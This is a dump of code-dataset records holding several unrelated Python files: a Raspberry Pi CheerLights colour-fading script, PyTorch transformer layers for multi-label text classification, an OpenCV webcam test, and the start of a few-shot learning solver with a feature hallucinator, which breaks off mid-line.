"usage_type": "attribute"}, {"api_name": "pygame.MOUSEBUTTONUP", "line_number": 126, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 146, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 146, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 152, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 152, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 160, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 160, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 168, "usage_type": "call"}]} +{"seq_id": "58053991", "text": "# This is a Python 3 script which allows you to run CheerLights on Raspberry Pi using GPIO.\n# Copyright (c) 132ikl 2017\nimport time\nimport requests\nimport re\nrgb = [200,13,67]\nstart = [rgb[0],rgb[1],rgb[2]]\nfinish = [255,255,255]\ncheerColor = \"FF4500\"\noldColor = \"FF0000\"\n\n# From StackExchange user Jeremy Cantrell. Thanks! 
Link: https://goo.gl/HGZGYh\ndef hex_to_rgb(value):\n value = value.lstrip('#')\n lv = len(value)\n return tuple(int(value[i:i + lv // 3], 16) for i in range(0, lv, lv // 3))\n\ndef rgb_to_hex(red, green, blue):\n return '%02x%02x%02x' % (red, green, blue)\n\ndef fade(t1, t2, sleep=20, steps=200):\n\tfor x in range(steps):\n\t\trStep = (float(t2[0])-float(t1[0]))/steps\n\t\tgStep = (float(t2[1])-float(t1[1]))/steps\n\t\tbStep = (float(t2[2])-float(t1[2]))/steps\n\t\trgb[0] += rStep\n\t\trgb[1] += gStep\n\t\trgb[2] += bStep\n\t\tprint(int(rgb[2]))\n\t\ttime.sleep(sleep / 1000.0)\n\nwhile True:\n\ttry:\n\t\tresponse = requests.get(\"http://api.thingspeak.com/channels/1417/field/2/last.txt\")\n\t\toldColor = cheerColor\n\t\tcheerColor = re.search(\"b\\'#(\\w+)\",str(response.content))\n\t\tcheerColor = cheerColor.group(1)\n\texcept:\n\t\tprint(\"An error occured! There is likely no internet connection. Trying again in 5 seconds...\")\n\tif oldColor != cheerColor:\n\t\tcheerRGB = hex_to_rgb(cheerColor)\n\t\tstart = [rgb[0],rgb[1],rgb[2]]\n\t\tfinish = [cheerRGB[0],cheerRGB[1],cheerRGB[2]]\n\t\tfade(start,finish)\n\telse:\n\t\tprint(\"Color is same as old color. Checking again in 5 seconds...\")\n\ttime.sleep(5)", "sub_path": "RaspberryLights.py", "file_name": "RaspberryLights.py", "file_ext": "py", "file_size_in_byte": 1475, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "time.sleep", "line_number": 30, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 34, "usage_type": "call"}, {"api_name": "re.search", "line_number": 36, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 47, "usage_type": "call"}]} +{"seq_id": "78358962", "text": "import numpy as np\r\nimport torch\r\nfrom torch import nn\r\nfrom torch.autograd import Variable\r\nfrom torch.nn import functional as F\r\nfrom rezero.transformer import RZTXEncoderLayer\r\nfrom models_h_transformer.modules import PositionalEncoding\r\n\r\n\r\nclass DMLC(nn.Module):\r\n def __init__(self, w2v_weight, vocab_size, embedding_dim, hidden_dim, batch_size, num_labels):\r\n super(DMLC, self).__init__()\r\n self.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\r\n self.emd = EmbeddingLayer(w2v_weight, vocab_size, embedding_dim, hidden_dim, batch_size)\r\n self.sl = SentenceLayer(embedding_dim, hidden_dim, batch_size, num_labels)\r\n self.dl = DecisionLayer(hidden_dim, num_labels)\r\n\r\n def init_hidden_state(self, batch_size=None):\r\n # self.emd.init_hidden_state(batch_size)\r\n self.sl.init_hidden_state(batch_size)\r\n\r\n def forward(self, input, w_mask, s_mask):\r\n output_list = []\r\n w1 = []\r\n input = input.permute(1, 0, 2)\r\n w_mask = w_mask.permute(1, 0, 2)\r\n for i, m in zip(input, w_mask):\r\n output, w = self.emd(i.permute(1, 0), m)\r\n output_list.append(output)\r\n w1.append(w)\r\n output = torch.cat(output_list, 0)\r\n output, w2 = self.sl(output, s_mask)\r\n output, w3 = self.dl(output)\r\n return output, [w1, w2, w3]\r\n\r\n\r\nclass EmbeddingLayer(nn.Module):\r\n def __init__(self, w2v_weight, vocab_size, embedding_dim, hidden_dim, batch_size, num_heads=2, head_dim=25):\r\n super(EmbeddingLayer, self).__init__()\r\n self.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\r\n self.vocab_size = vocab_size\r\n self.embedding_dim = embedding_dim\r\n self.hidden_dim = hidden_dim\r\n self.batch_size = batch_size\r\n self.num_heads = num_heads\r\n self.head_dim = head_dim\r\n 
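# when True, sinusoidal positional encodings are added to the embeddings; otherwise plain dropout is applied\r\n 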
self.pos = False\r\n self.embedding = nn.Embedding(vocab_size, embedding_dim).from_pretrained(\r\n torch.from_numpy(w2v_weight), padding_idx=0)\r\n self.embedding.weight.requires_grad = False\r\n # self.embedding = nn.Embedding(vocab_size, embedding_dim, padding_idx=0)\r\n # nn.init.xavier_normal_(self.embedding.weight)\r\n\r\n if self.pos:\r\n self.pe = PositionalEncoding(d_model=embedding_dim)\r\n\r\n encoder_layer = nn.TransformerEncoderLayer(embedding_dim, 4, 256, 0.1, activation='gelu')\r\n # encoder_layer = RZTXEncoderLayer(d_model=embedding_dim, nhead=4, dim_feedforward=256, dropout=0.1,\r\n # activation='gelu')\r\n self.transformer_encoder = nn.TransformerEncoder(encoder_layer, 2)\r\n\r\n self.trans = nn.Linear(embedding_dim, head_dim * num_heads, bias=True)\r\n nn.init.xavier_normal_(self.trans.weight)\r\n self.query = nn.Parameter(torch.empty(head_dim * num_heads, 1))\r\n nn.init.xavier_normal_(self.query)\r\n self.linear = nn.Linear(head_dim * num_heads, hidden_dim, bias=True)\r\n nn.init.xavier_normal_(self.linear.weight)\r\n\r\n # self.trans = nn.ModuleList()\r\n # self.contents = nn.ModuleList()\r\n # d = [50, 50, 50, 50]\r\n # # self.scale = np.sqrt(50)\r\n # self.scaled = d\r\n # for i in range(len(d)):\r\n # l = nn.Linear(embedding_dim, d[i], bias=True)\r\n # nn.init.xavier_normal_(l.weight)\r\n # c = nn.Linear(d[i], 1, bias=False)\r\n # nn.init.xavier_normal_(c.weight)\r\n # self.trans.append(l)\r\n # self.contents.append(c)\r\n # self.linear = nn.Linear(sum(d), embedding_dim, bias=True)\r\n # nn.init.xavier_normal_(self.linear.weight)\r\n\r\n self.drop = nn.Dropout(0.1)\r\n self.drop1 = nn.Dropout(0.1)\r\n self.tanh = nn.Tanh()\r\n\r\n def forward(self, sequence, mask):\r\n sequence_embedding = self.embedding(sequence)\r\n if self.pos:\r\n sequence_embedding = self.pe(sequence_embedding)\r\n else:\r\n sequence_embedding = self.drop(sequence_embedding)\r\n f_output = self.transformer_encoder(sequence_embedding, src_key_padding_mask=mask)\r\n\r\n output = self.trans(f_output)\r\n # check contiguous and make batch first\r\n output = output.contiguous().view(output.size()[0], output.size()[1],\r\n self.num_heads, self.head_dim).permute(1, 2, 0, 3)\r\n query = self.query.contiguous().view(self.num_heads, self.head_dim).unsqueeze(0).permute(1, 2, 0)\r\n score = torch.matmul(output, query)\r\n mask = mask.unsqueeze(1).unsqueeze(3).expand(-1, self.num_heads, -1, -1)\r\n weight = F.softmax(score.masked_fill(mask, float('-inf')), dim=2)\r\n output = torch.matmul(output.transpose(2, 3), weight).squeeze(-1)\r\n output = output.contiguous().view(1, output.size()[0], -1)\r\n output = self.linear(output)\r\n output = self.drop1(output)\r\n\r\n # weight = []\r\n # o = []\r\n # for i in range(len(self.scaled)):\r\n # output = self.trans[i](f_output)\r\n # # output = self.drop(output)\r\n # score = self.contents[i](output).squeeze(2).permute(1, 0)\r\n # w = F.softmax(score.masked_fill(mask, float('-inf')), dim=1)\r\n # # w = self.drop(w)\r\n # output = torch.bmm(output.permute(1, 0, 2).transpose(1, 2),\r\n # w.unsqueeze(2)).squeeze(2).unsqueeze(0)\r\n # weight.append(w.unsqueeze(1))\r\n # o.append(output)\r\n # # print(torch.max(score))\r\n # output = torch.cat(o, dim=-1)\r\n # output = self.linear(output)\r\n # output = self.drop1(output)\r\n\r\n return output, weight\r\n\r\n\r\nclass SentenceLayer(nn.Module):\r\n def __init__(self, input_dim, hidden_dim, batch_size, num_labels, num_heads=2, head_dim=25):\r\n super(SentenceLayer, self).__init__()\r\n self.device = torch.device(\"cuda:0\" 
if torch.cuda.is_available() else \"cpu\")\r\n self.input_dim = input_dim\r\n self.hidden_dim = hidden_dim\r\n self.batch_size = batch_size\r\n self.num_labels = num_labels\r\n self.num_heads = num_heads\r\n self.head_dim = head_dim\r\n self.pos = False\r\n\r\n if self.pos:\r\n self.pe = PositionalEncoding(d_model=input_dim)\r\n\r\n encoder_layer = nn.TransformerEncoderLayer(input_dim, 4, 512, 0.1, activation='gelu')\r\n # encoder_layer = RZTXEncoderLayer(d_model=input_dim, nhead=4, dim_feedforward=512, dropout=0.1,\r\n # activation='gelu')\r\n self.transformer_encoder = nn.TransformerEncoder(encoder_layer, 1)\r\n\r\n self.trans = nn.Linear(hidden_dim, head_dim * num_heads, bias=True)\r\n nn.init.xavier_normal_(self.trans.weight)\r\n self.query = nn.Parameter(torch.empty(head_dim * num_heads, 1))\r\n nn.init.xavier_normal_(self.query)\r\n self.linear = nn.Linear(head_dim * num_heads, hidden_dim, bias=True)\r\n nn.init.xavier_normal_(self.linear.weight)\r\n self.lb = nn.Linear(hidden_dim, hidden_dim * num_labels, bias=True)\r\n nn.init.xavier_normal_(self.lb.weight)\r\n\r\n # self.trans = nn.ModuleList()\r\n # self.contents = nn.ModuleList()\r\n # d = [50, 50, 50, 50]\r\n # self.scaled = d\r\n # for i in range(len(d)):\r\n # l = nn.Linear(hidden_dim, d[i], bias=True)\r\n # nn.init.xavier_normal_(l.weight)\r\n # c = nn.Linear(d[i], 1, bias=False)\r\n # nn.init.xavier_normal_(c.weight)\r\n # self.trans.append(l)\r\n # self.contents.append(c)\r\n # self.linear = nn.Linear(sum(d), hidden_dim, bias=True)\r\n # nn.init.xavier_normal_(self.linear.weight)\r\n # self.label = nn.ModuleList()\r\n # for i in range(num_labels):\r\n # lb = nn.Linear(hidden_dim, hidden_dim, bias=True)\r\n # nn.init.xavier_normal_(lb.weight)\r\n # self.label.append(lb)\r\n\r\n self.drop = nn.Dropout(0.1)\r\n self.drop1 = nn.Dropout(0.1)\r\n self.drop2 = nn.Dropout(0.1)\r\n self.tanh = nn.Tanh()\r\n\r\n def forward(self, input, mask):\r\n if self.pos:\r\n input = self.pe(input)\r\n f_output = self.transformer_encoder(input, src_key_padding_mask=mask)\r\n\r\n output = self.trans(f_output)\r\n # check contiguous and make batch first\r\n output = output.contiguous().view(output.size()[0], output.size()[1],\r\n self.num_heads, self.head_dim).permute(1, 2, 0, 3)\r\n query = self.query.contiguous().view(self.num_heads, self.head_dim).unsqueeze(0).permute(1, 2, 0)\r\n score = torch.matmul(output, query)\r\n mask = mask.unsqueeze(1).unsqueeze(3).expand(-1, self.num_heads, -1, -1)\r\n weight = F.softmax(score.masked_fill(mask, float('-inf')), dim=2)\r\n output = torch.matmul(output.transpose(2, 3), weight).squeeze(-1)\r\n\r\n output = output.contiguous().view(1, output.size()[0], -1)\r\n output = self.linear(output)\r\n output = self.drop(output)\r\n output = self.lb(output)\r\n output = self.drop2(output)\r\n output = output.contiguous().view(1, output.size()[1], self.num_labels, self.hidden_dim).squeeze(0).transpose(0, 1)\r\n\r\n # weight = []\r\n # o = []\r\n # for i in range(len(self.scaled)):\r\n # output = self.trans[i](f_output)\r\n # # output = self.drop(output)\r\n # score = self.contents[i](output).squeeze(2).permute(1, 0)\r\n # w = F.softmax(score.masked_fill(mask, float('-inf')), dim=1)\r\n # # w = self.drop1(w)\r\n # output = torch.bmm(output.permute(1, 0, 2).transpose(1, 2),\r\n # w.unsqueeze(2)).squeeze(2).unsqueeze(0)\r\n # weight.append(w.unsqueeze(1))\r\n # o.append(output)\r\n # output = torch.cat(o, dim=-1)\r\n # output = self.linear(output)\r\n # output = self.drop(output)\r\n # labels = []\r\n # for i in 
range(self.num_labels):\r\n # l_out = self.label[i](output)\r\n # # l_out = F.gelu(l_out)\r\n # l_out = self.drop2(l_out)\r\n # labels.append(l_out)\r\n # output = torch.cat(labels, dim=0)\r\n\r\n return output, weight\r\n\r\n\r\nclass DecisionLayer(nn.Module):\r\n def __init__(self, input_dim, num_class=33, hidden_dim=100, n_head=4, dropout=0.1):\r\n super(DecisionLayer, self).__init__()\r\n\r\n encoder_layer = nn.TransformerEncoderLayer(input_dim, 4, 512, 0.1, activation='gelu')\r\n # encoder_layer = RZTXEncoderLayer(d_model=input_dim, nhead=4, dim_feedforward=512, dropout=0.1,\r\n # activation='gelu')\r\n self.transformer_encoder = nn.TransformerEncoder(encoder_layer, 1)\r\n\r\n # self.out = nn.Linear(input_dim, 1)\r\n # nn.init.xavier_normal_(self.out.weight)\r\n\r\n self.topic_embedding = nn.Parameter(torch.empty(num_class, input_dim))\r\n self.mlp_1 = nn.Linear(num_class, hidden_dim)\r\n self.mlp_2 = nn.Linear(hidden_dim, 1)\r\n nn.init.xavier_normal_(self.topic_embedding)\r\n nn.init.xavier_normal_(self.mlp_1.weight)\r\n nn.init.xavier_normal_(self.mlp_2.weight)\r\n # self.ln = nn.LayerNorm(num_class)\r\n # self.scale = num_class ** -0.5\r\n\r\n def forward(self, input):\r\n # output = input\r\n output = self.transformer_encoder(input)\r\n attn_output_weights=None\r\n #o, attn_output_weights = self.transformer_encoder.layers[0].self_attn(input, input, input)\r\n\r\n # interaction = torch.matmul(self.topic_embedding, output.permute(1, 2, 0))\r\n interaction = torch.matmul(output.permute(1, 0, 2), self.topic_embedding.transpose(1, 0))\r\n # interaction = self.ln(interaction)\r\n output = F.gelu(self.mlp_1(interaction))\r\n output = self.mlp_2(output).squeeze(-1)\r\n\r\n # output = self.out(output).squeeze(2).transpose(0, 1)\r\n\r\n return output, attn_output_weights\r\n", "sub_path": "models_h_transformer/layers.py", "file_name": "layers.py", "file_ext": "py", "file_size_in_byte": 12031, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "torch.nn.Module", "line_number": 10, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 10, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 13, "usage_type": "attribute"}, {"api_name": "torch.cat", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 37, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 37, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 40, "usage_type": "attribute"}, {"api_name": "torch.nn.Embedding", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 48, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 49, "usage_type": "call"}, {"api_name": "models_h_transformer.modules.PositionalEncoding", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.nn.TransformerEncoderLayer", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 57, "usage_type": "name"}, {"api_name": "torch.nn.TransformerEncoder", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 60, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 62, "usage_type": 
"call"}, {"api_name": "torch.nn", "line_number": 62, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_normal_", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 63, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 63, "usage_type": "name"}, {"api_name": "torch.nn.Parameter", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 64, "usage_type": "name"}, {"api_name": "torch.empty", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.nn.init.xavier_normal_", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 65, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 65, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 66, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_normal_", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 67, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 67, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 84, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 85, "usage_type": "name"}, {"api_name": "torch.nn.Tanh", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 86, "usage_type": "name"}, {"api_name": "torch.matmul", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.nn.functional.softmax", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 103, "usage_type": "name"}, {"api_name": "torch.matmul", "line_number": 104, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 129, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 129, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 132, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 132, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 132, "usage_type": "attribute"}, {"api_name": "models_h_transformer.modules.PositionalEncoding", "line_number": 142, "usage_type": "call"}, {"api_name": "torch.nn.TransformerEncoderLayer", "line_number": 144, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 144, "usage_type": "name"}, {"api_name": "torch.nn.TransformerEncoder", "line_number": 147, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 147, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 149, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 149, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_normal_", "line_number": 150, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 150, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 150, "usage_type": "name"}, {"api_name": "torch.nn.Parameter", "line_number": 151, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 151, "usage_type": "name"}, {"api_name": "torch.empty", "line_number": 151, "usage_type": "call"}, {"api_name": "torch.nn.init.xavier_normal_", "line_number": 152, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 152, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 152, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 153, "usage_type": 
"call"}, {"api_name": "torch.nn", "line_number": 153, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_normal_", "line_number": 154, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 154, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 154, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 155, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 155, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_normal_", "line_number": 156, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 156, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 156, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 177, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 177, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 178, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 178, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 179, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 179, "usage_type": "name"}, {"api_name": "torch.nn.Tanh", "line_number": 180, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 180, "usage_type": "name"}, {"api_name": "torch.matmul", "line_number": 192, "usage_type": "call"}, {"api_name": "torch.nn.functional.softmax", "line_number": 194, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 194, "usage_type": "name"}, {"api_name": "torch.matmul", "line_number": 195, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 230, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 230, "usage_type": "name"}, {"api_name": "torch.nn.TransformerEncoderLayer", "line_number": 234, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 234, "usage_type": "name"}, {"api_name": "torch.nn.TransformerEncoder", "line_number": 237, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 237, "usage_type": "name"}, {"api_name": "torch.nn.Parameter", "line_number": 242, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 242, "usage_type": "name"}, {"api_name": "torch.empty", "line_number": 242, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 243, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 243, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 244, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 244, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_normal_", "line_number": 245, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 245, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 245, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_normal_", "line_number": 246, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 246, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 246, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_normal_", "line_number": 247, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 247, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 247, "usage_type": "name"}, {"api_name": "torch.matmul", "line_number": 258, "usage_type": "call"}, {"api_name": "torch.nn.functional.gelu", "line_number": 260, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 260, "usage_type": "name"}]} +{"seq_id": "77891065", "text": "import numpy as np\nimport cv2\nimport 
os\n\ndef main():\n camera = cv2.VideoCapture(0)\n ## get camera\n\n camera.set(cv2.CAP_PROP_FRAME_WIDTH, 480)\n camera.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)\n ## set width & height\n\n\n if not camera.isOpened(): ##checks for camera\n print(\"no camera\") ##if false, exits\n return\n\n while (cv2.waitKey(1) != 27) and (camera.isOpened()): ##exits if user presses esc or camera is closed/disconnected\n nextframe, originalframe = camera.read()\n ## get next frame\n\n if not nextframe or originalframe is None:\n break\n #ends if no new frames\n\n cv2.namedWindow(\"capture\", cv2.WINDOW_AUTOSIZE)\n cv2.imshow(\"capture\", originalframe)\n\n cv2.destroyAllWindows()\n return\n ## end capture\n\nif __name__ == \"__main__\":\n main()\n## dec.24.2016 ##tested on my mac; it works\n##step 2: detect moving object in the image then mark it.\n##step 3: track moving object.\n", "sub_path": "Pedestrian Tracking Rover/camera test.py", "file_name": "camera test.py", "file_ext": "py", "file_size_in_byte": 987, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "cv2.VideoCapture", "line_number": 6, "usage_type": "call"}, {"api_name": "cv2.CAP_PROP_FRAME_WIDTH", "line_number": 9, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FRAME_HEIGHT", "line_number": 10, "usage_type": "attribute"}, {"api_name": "cv2.waitKey", "line_number": 18, "usage_type": "call"}, {"api_name": "cv2.namedWindow", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.WINDOW_AUTOSIZE", "line_number": 26, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "637264989", "text": "import os\nimport numpy as np\nimport torch\nimport torchvision\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision.utils as vutils\nfrom torch.optim.lr_scheduler import StepLR\nfrom model import Convnet, MLP, Hallucinator, Discriminator\nfrom utils import pairwise_distances\n\n\nclass Solver(object):\n def __init__(self, config, train_loader, val_loader):\n self.use_cuda = torch.cuda.is_available()\n self.device = torch.device('cuda' if self.use_cuda else 'cpu')\n self.train_loader = train_loader\n self.val_loader = val_loader\n self.episodes_per_epoch = config.episodes_per_epoch\n self.N_way_train = config.N_way_train\n self.N_shot_train = config.N_shot_train\n self.N_query_train = config.N_query_train\n self.M_aug_train = config.M_aug_train\n self.N_way_val = config.N_way_val\n self.N_shot_val = config.N_shot_val\n self.N_query_val = config.N_query_val\n self.M_aug_val = config.M_aug_val\n self.matching_fn = config.matching_fn\n self.nz = config.nz\n\n self.num_epochs = config.num_epochs\n self.resume_iter = config.resume_iter\n self.num_d_steps = config.num_d_steps\n self.lr = config.lr\n self.num_steps_decay = config.num_steps_decay\n self.beta1 = config.beta1\n self.beta2 = config.beta2\n self.weight_decay = config.weight_decay\n self.active_adversarial_loss_step = config.active_adversarial_loss_step\n self.alpha_weight = config.alpha_weight\n self.exp_name = config.name\n os.makedirs(config.ckp_dir, exist_ok=True)\n self.ckp_dir = os.path.join(config.ckp_dir, self.exp_name)\n os.makedirs(self.ckp_dir, exist_ok=True)\n self.log_interval = config.log_interval\n self.ckp_interval = config.ckp_interval\n\n self.use_wandb = config.use_wandb\n \n self.build_model()\n\n def build_model(self):\n self.cnn = 
Convnet().to(self.device)\n self.g = Hallucinator(self.nz).to(self.device)\n self.mlp = MLP().to(self.device)\n self.d = Discriminator().to(self.device)\n\n self.optimizer = torch.optim.AdamW(list(self.cnn.parameters()) + list(self.g.parameters()) + list(self.mlp.parameters()), lr=self.lr, betas=[self.beta1, self.beta2], weight_decay=self.weight_decay)\n self.optimizer_d = torch.optim.AdamW(self.d.parameters(), lr=self.lr, betas=[self.beta1, self.beta2], weight_decay=self.weight_decay)\n\n if self.matching_fn == 'parametric':\n self.parametric = nn.Sequential(\n nn.Linear(800, 400),\n nn.ReLU(),\n nn.Dropout(),\n nn.Linear(400, 1)\n ).to(self.device)\n self.optimizer = torch.optim.AdamW(list(self.cnn.parameters()) + list(self.g.parameters()) + list(self.mlp.parameters()) + list(self.parametric.parameters()), lr=self.lr, betas=[self.beta1, self.beta2], weight_decay=self.weight_decay)\n\n self.scheduler = StepLR(self.optimizer, step_size=self.num_steps_decay, gamma=0.9)\n self.scheduler_d = StepLR(self.optimizer_d, step_size=self.num_steps_decay, gamma=0.9)\n\n def save_checkpoint(self, step):\n state = {'cnn': self.cnn.state_dict(),\n 'g': self.g.state_dict(),\n 'mlp': self.mlp.state_dict(),\n 'optimizer' : self.optimizer.state_dict(),\n 'd': self.d.state_dict(),\n 'optimizer_d' : self.optimizer_d.state_dict()}\n\n if self.matching_fn == 'parametric':\n state['parametric'] = self.parametric.state_dict()\n\n new_checkpoint_path = os.path.join(self.ckp_dir, '{}-improved_dhm.pth'.format(step + 1))\n torch.save(state, new_checkpoint_path)\n print('model saved to %s' % new_checkpoint_path)\n\n def load_checkpoint(self, resume_iter):\n print('Loading the trained models from step {}...'.format(resume_iter))\n new_checkpoint_path = os.path.join(self.ckp_dir, '{}-improved_dhm.pth'.format(resume_iter))\n state = torch.load(new_checkpoint_path)\n self.cnn.load_state_dict(state['cnn'])\n self.g.load_state_dict(state['g'])\n self.mlp.load_state_dict(state['mlp'])\n self.optimizer.load_state_dict(state['optimizer'])\n self.d.load_state_dict(state['d'])\n self.optimizer_d.load_state_dict(state['optimizer_d'])\n if self.matching_fn == 'parametric':\n self.parametric.load_state_dict(state['parametric'])\n print('model loaded from %s' % new_checkpoint_path)\n \n def train(self):\n task_criterion = nn.CrossEntropyLoss()\n adversarial_criterion = nn.BCELoss()\n\n best_mean = 0\n iteration = 0\n real_label = 1.\n fake_label = 0.\n\n self.sample_idx_val = []\n self.noise_val = []\n for i in range(self.episodes_per_epoch):\n self.sample_idx_val.append(torch.tensor([torch.randint(self.N_shot_val * i, self.N_shot_val * (i + 1), (self.M_aug_val,)).numpy() for i in range(self.N_way_val)]).reshape(-1))\n self.noise_val.append(torch.randn((self.N_way_val * self.M_aug_val, self.nz), device=self.device))\n\n if self.resume_iter:\n print(\"resuming step %d ...\"% self.resume_iter)\n iteration = self.resume_iter\n self.load_checkpoint(self.resume_iter)\n loss, mean, std = self.eval()\n if mean > best_mean:\n best_mean = mean\n\n episodic_acc = []\n\n for ep in range(self.num_epochs):\n self.cnn.train()\n self.g.train()\n self.mlp.train()\n self.d.train()\n for batch_idx, (data, target) in enumerate(self.train_loader):\n data = data.to(self.device)\n \n support_input = data[:self.N_way_train * self.N_shot_train,:,:,:] \n query_input = data[self.N_way_train * self.N_shot_train:,:,:,:]\n\n label_encoder = {target[i * self.N_shot_train] : i for i in range(self.N_way_train)}\n query_label = 
